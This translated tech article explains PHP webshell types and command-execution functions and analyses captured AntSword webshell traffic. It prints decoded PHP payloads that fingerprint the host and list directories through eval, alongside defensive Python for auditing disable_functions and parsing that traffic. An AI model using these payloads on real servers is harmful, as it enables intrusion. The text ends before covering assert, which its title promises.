Analyze webshell and what is the difference between eval and assert

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article analyzes webshells and explains the difference between eval and assert. The editor finds it very practical and shares it here; I hope you get something out of reading it.

Webshell classification

One-sentence Trojan (一句话木马)

A webshell that executes PHP code sent by a client on the target server and interacts with a management client (such as China Chopper/Caidao, Cknife, Behinder/ice scorpion, or AntSword); commonly known as a "small horse" (小马).

Multi-function Trojan

Written in full PHP with much more code, executed on the server to provide all of a webshell's functions in one file; commonly known as a "big horse" (大马).

Logical Trojan

A webshell that exploits logic vulnerabilities in the system (such as a PHP UAF vulnerability) to bypass access controls or to perform special functions.

PHP functions that execute system commands

system
    string system(string $command [, int &$return_var])
    # $command is the command to execute; &$return_var is optional and receives the exit status after the command runs
    # system() echoes its output, so the result is displayed on the page

passthru
    void passthru(string $command [, int &$return_var])
    # similar to system(): $command is the command to execute, &$return_var optionally receives the exit status
    # passthru() echoes its output, so the result is displayed on the page

exec
    string exec(string $command [, array &$output [, int &$return_var]])
    # $command is the command to execute
    # $output receives each line of the command output as an array element; $return_var receives the exit status (to detect success or failure)
    # exec() does not echo; by default it returns only the last line of the output

shell_exec
    string shell_exec(string $command)
    # $command is the command to execute
    # shell_exec() does not echo; the full output is returned and can be printed to the page with echo

` (backtick operator)
    # shell_exec() is in fact only a variant of the backtick (`) operator; when shell_exec is disabled, backticks cannot be executed either
    # Backticks are called the execution operator in PHP: PHP tries to run the contents of the backticks as a shell command and returns the output

popen
    resource popen(string $command, string $mode)
    # takes two arguments: the command to execute and the mode of the pipe, where "r" means read and "w" means write
    # does not return the execution result directly but a file pointer; the command has nonetheless been executed
    # popen() opens a pipe to a process forked by running the given command. It returns a file pointer like fopen(), except that it is unidirectional (read or write only) and must be closed with pclose(). The pointer can be used with fgets(), fgetss() and fwrite()

proc_open
    resource proc_open(string $cmd, array $descriptorspec, array &$pipes [, string $cwd [, array $env [, array $other_options]]])
    # similar to popen(), but can provide a bidirectional pipe

pcntl_exec
    void pcntl_exec(string $path [, array $args [, array $envs]])
    # $path is the path of an executable binary, or of a script whose first line names the executable interpreter
    # $args is an array of string arguments passed to the program
    # pcntl is a Linux extension that must be installed separately; it adds support for multithreaded operation of PHP
    # pcntl_exec() executes the specified program in the current process space. Version requirement: PHP > 4.2.0
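One server-side mitigation the list above points at is PHP's disable_functions directive. The following added example (my own, not from the article) parses a php.ini text and reports which of the listed command-execution functions are still callable; the php.ini fragments are constructed.

```python
import re

# Command-execution functions listed above. The backtick operator is not a
# function, so it cannot be named here; as the article notes, it stops working
# when shell_exec is disabled. eval is a language construct and likewise cannot
# be listed in disable_functions.
EXEC_FUNCTIONS = ("system", "passthru", "exec", "shell_exec",
                  "popen", "proc_open", "pcntl_exec")

def parse_disable_functions(ini_text):
    """Return the set of function names in the last active (uncommented)
    disable_functions line of a php.ini text; empty set if none."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.strip()
        if line.startswith((";", "#")):      # php.ini comment
            continue
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"\'')   # values may be quoted
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled

def audit_disable_functions(ini_text):
    """Return the exec functions that remain callable under this php.ini."""
    disabled = parse_disable_functions(ini_text)
    return [f for f in EXEC_FUNCTIONS if f not in disabled]

# Constructed php.ini fragments (not taken from any real server).
WEAK_INI = """
; default: nothing disabled, every function above is available to a webshell
disable_functions =
"""
HARDENED_INI = """
disable_functions = system, passthru, exec, shell_exec, popen, proc_open, pcntl_exec
"""

if __name__ == "__main__":
    print("still callable (weak):", audit_disable_functions(WEAK_INI))
    print("still callable (hardened):", audit_disable_functions(HARDENED_INI))
```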

Analysis of an Ant Sword webshell connection

The functions above can each serve as a simple webshell that runs system commands. So what does a webshell that interacts with a client (China Chopper, CKnife, AntSword, Behinder) look like?

Prepare a one-sentence Trojan.

Configure a manual proxy in Ant Sword and capture the request with Burp for analysis, as shown below:

Decoding the cmd parameter gives the following code:

    // temporarily disable PHP error display
    @ini_set("display_errors", "0");
    // set the execution time limit to zero, i.e. run until the script ends, to prevent time-outs on operations such as dir and file upload
    @set_time_limit(0);
    // asenc: receives the output and returns it unchanged (placeholder for an encoder)
    function asenc($out) { return $out; };
    function asoutput() {
        // fetch the data from the output buffer
        $output = ob_get_contents();
        // clear the buffer and close it
        ob_end_clean();
        echo "b48a94c80a";
        // output the data
        echo @asenc($output);
        echo "606e3eed3";
    }
    // open the output buffer so that all output is saved
    ob_start();
    try {
        // $_SERVER["SCRIPT_FILENAME"] is the absolute path of the currently executing script; dirname() returns the directory part of the path, so $D is the directory of the running script
        $D = dirname($_SERVER["SCRIPT_FILENAME"]);
        // $_SERVER["PATH_TRANSLATED"] is the file-system path of the current script (not the document root), i.e. the result after the server maps the virtual path to the real path
        if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
        // concatenate the directory and a tab
        $R = "{$D}\t";
        // determine whether this is a Linux directory (starts with "/")
        if (substr($D, 0, 1) != "/") {
            // otherwise iterate over the drive letters
            foreach (range("C", "Z") as $L)
                // if the drive letter exists, append it
                if (is_dir("{$L}:")) $R .= "{$L}:";
        } else {
            // otherwise append "/"
            $R .= "/";
        }
        // append a tab
        $R .= "\t";
        // if posix_getegid() exists, look up the user record for the effective user id
        $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
        // use the name attribute if the user record is not empty, otherwise call get_current_user()
        $s = ($u) ? $u["name"] : @get_current_user();
        // append information about the system running PHP, then the user name
        $R .= php_uname();
        $R .= "\t{$s}";
        echo $R;
    } catch (Exception $e) {
        // catch exception
        echo "ERROR://" . $e->getMessage();
    };
    // run the program
    asoutput();
    die();

Executing this code through the eval function returns the result shown in the following figure:

This shows that eval parses and executes the string as PHP code: as long as the client constructs the corresponding PHP code and sends it to the webshell on the server, the server executes it and returns the result.

When we intercept a directory listing next, we can see that the Ant Sword client again sends encapsulated code to the webshell on the server, as shown in the following figure.

    @ini_set("display_errors", "0");
    @set_time_limit(0);
    function asenc($out) { return $out; };
    function asoutput() {
        $output = ob_get_contents();
        ob_end_clean();
        echo "7322e6777";
        echo @asenc($output);
        echo "7529076fb4d2";
    }
    ob_start();
    try {
        // the directory to list arrives base64-encoded in a second POST parameter with a random name
        $D = base64_decode($_POST["od0d1a967133cb"]);
        $F = @opendir($D);
        if ($F == NULL) {
            echo("ERROR:// Path Not Found Or No Permission!");
        } else {
            $M = NULL;  // directories
            $L = NULL;  // files
            while ($N = @readdir($F)) {
                $P = $D . $N;
                // modification time, then the last four octal digits of the permissions
                $T = @date("Y-m-d H:i:s", @filemtime($P));
                @$E = substr(base_convert(@fileperms($P), 10, 8), -4);
                // one tab-separated record per entry: name, mtime, size, permissions
                $R = "\t" . $T . "\t" . @filesize($P) . "\t" . $E . "\n";
                if (@is_dir($P)) $M .= $N . "/" . $R;
                else $L .= $N . $R;
            }
            echo $M . $L;
            @closedir($F);
        };
    } catch (Exception $e) {
        echo "ERROR://" . $e->getMessage();
    };
    asoutput();
    die();

The second POST parameter sent with it: od0d1a967133cb=QzovcGhwU3R1ZHkvV1dXLw==

The value of the od0d1a967133cb key, QzovcGhwU3R1ZHkvV1dXLw==, base64-decodes to C:/phpStudy/WWW/, the root directory of my web service. You can see that the code handed to eval is basically the same each time; only the logic inside the try-catch block changes. Traditional webshell management tools therefore rely on functions such as eval and assert, which treat a string as PHP code, to connect to the webshell and run commands: code can be executed and operations completed in whatever language the current web container can parse.
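A defender-side parser for the request and response framing shown above, added here as an example (my own code, not AntSword's or the article's): it finds the POST parameter carrying the asenc/asoutput template, pulls out the two random echo markers, base64-decodes the side parameters, and cuts the tool output out of a response using those markers. The sample traffic is constructed to mirror the capture above.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Fingerprints of the template seen in the captured requests (whitespace
# removed): error display off, no time limit, and the asenc/asoutput wrapper
# that frames the real output between two random hex markers.
TEMPLATE_MARKERS = ('@ini_set("display_errors","0")', '@set_time_limit(0)',
                    'functionasenc(', 'functionasoutput(', 'ob_get_contents()')
# echo "b48a94c80a"; ... echo "606e3eed3"; -> the two framing markers
ECHO_RE = re.compile(r'echo\s*"([0-9a-f]{6,})"\s*;')

def analyse_request(body):
    """Parse a URL-encoded POST body; return the eval parameter name, the
    framing markers and the base64-decoded side parameters, or None."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    for name, value in params.items():
        code = re.sub(r"\s+", "", value)          # ignore spacing differences
        if not all(m in code for m in TEMPLATE_MARKERS):
            continue
        decoded = {}
        for other, raw in params.items():
            if other == name:
                continue
            try:   # arguments such as the directory travel base64-encoded
                decoded[other] = base64.b64decode(raw, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                pass
        return {"eval_param": name, "markers": ECHO_RE.findall(value),
                "decoded_args": decoded}
    return None

def extract_response(body, markers):
    """Return the tool output framed by the request's two markers, or None."""
    if len(markers) != 2:
        return None
    start = body.find(markers[0])
    end = body.find(markers[1], start + len(markers[0])) if start >= 0 else -1
    return body[start + len(markers[0]):end] if end >= 0 else None

# Constructed sample traffic modelled on the capture above (not real data).
SAMPLE_CODE = ('@ini_set("display_errors", "0");@set_time_limit(0);'
               'function asenc($out){return $out;};function asoutput(){'
               '$output=ob_get_contents();ob_end_clean();echo "7322e6777";'
               'echo @asenc($output);echo "7529076fb4d2";}ob_start();try{'
               '$D=base64_decode($_POST["od0d1a967133cb"]);echo $D;}'
               'catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();')
SAMPLE_REQUEST = urlencode({"cmd": SAMPLE_CODE, "od0d1a967133cb": "QzovcGhwU3R1ZHkvV1dXLw=="})
SAMPLE_RESPONSE = "7322e6777C:/phpStudy/WWW/7529076fb4d2"
```

Feeding real captures through analyse_request() and extract_response() lets a response body be matched to the request that produced it, since the markers are random per request.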

To sum up, to execute a string (or file stream) as PHP code, the script mainly uses the following functions:

eval: available in PHP 4, PHP 5 and PHP 7+. Takes one argument and executes the string as PHP code.
